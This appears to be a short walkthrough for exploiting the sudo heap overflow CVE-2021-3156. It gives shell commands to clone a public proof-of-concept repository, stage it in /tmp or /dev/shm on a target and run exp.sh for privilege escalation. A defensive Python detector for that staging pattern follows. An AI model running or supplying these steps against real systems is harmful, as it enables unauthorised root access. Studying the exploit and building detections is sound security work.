CVE-2021-3156

In January 2021, Qualys released a blog post, "CVE-2021-3156: Heap-Based Buffer Overflow in Sudo (Baron Samedit)", detailing a vulnerability that has existed in sudo for over a decade.

A proof of concept by LockedByte can be used to exploit this vulnerability on unpatched systems.

git clone git@github.com:lockedbyte/CVE-Exploits.git

This repo contains a few different exploits; we only care about the contents of CVE-2021-3156. The quickest way to get this to our target is to compress the directory:

tar -cvzf exploit.tgz CVE-2021-3156

Once compressed, use your preferred method to copy exploit.tgz to your target. Once copied over, extract it into either /tmp or /dev/shm, which should be writable by any user.

tar -zxvf exploit.tgz

Once extracted, change into the directory and run exp.sh:

cd CVE-2021-3156
chmod +x ./exp.sh
./exp.sh
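
The staging steps above as seen from the defender's side, as an added example that is not part of the original page or the LockedByte repository: it scans process-execution records for an archive unpacked under /tmp or /dev/shm, followed by chmod +x and execution of a file there. The record layout, function names and sample events are constructed assumptions.

```python
import os
import shlex

# Staging directories named on the page as writable by any user.
STAGING_DIRS = ("/tmp", "/dev/shm")

# Constructed sample records: (uid, cwd, command line). The layout is an
# assumption; populate it from auditd execve records or EDR telemetry.
SAMPLE_EVENTS = [
    (1001, "/home/dev", "tar -zxvf backup.tgz"),
    (1001, "/tmp", "tar -zxvf exploit.tgz"),
    (1001, "/tmp/CVE-2021-3156", "chmod +x ./exp.sh"),
    (1001, "/tmp/CVE-2021-3156", "./exp.sh"),
    (1002, "/dev/shm", "ls -la"),
]

def resolve(cwd, path):
    return os.path.normpath(os.path.join(cwd, path))

def in_staging(path):
    """True if path is a staging directory or lies beneath one."""
    return any(path == d or path.startswith(d + "/") for d in STAGING_DIRS)

def is_tar_extract(argv):
    """tar called with --extract or an 'x' in its short option cluster."""
    if os.path.basename(argv[0]) != "tar" or len(argv) < 2:
        return False
    opt = argv[1]
    return opt == "--extract" or (not opt.startswith("--") and "x" in opt)

def detect_staged_exec(events):
    """Return (uid, path) for files unpacked, chmod +x'd, then run in staging."""
    extracted, marked, alerts = set(), {}, []
    for uid, cwd, cmdline in events:
        argv = shlex.split(cmdline)
        if not argv:
            continue
        if is_tar_extract(argv) and in_staging(resolve(cwd, ".")):
            extracted.add(uid)
        elif os.path.basename(argv[0]) == "chmod" and len(argv) > 2 and "+x" in argv[1]:
            paths = {resolve(cwd, p) for p in argv[2:]}
            marked.setdefault(uid, set()).update(p for p in paths if in_staging(p))
        elif uid in extracted and resolve(cwd, argv[0]) in marked.get(uid, ()):
            alerts.append((uid, resolve(cwd, argv[0])))
    return alerts

if __name__ == "__main__":
    print(detect_staged_exec(SAMPLE_EVENTS))
```

Only the full extract, chmod, execute sequence by the same user inside a staging directory raises an alert, so routine archive handling in home directories stays quiet.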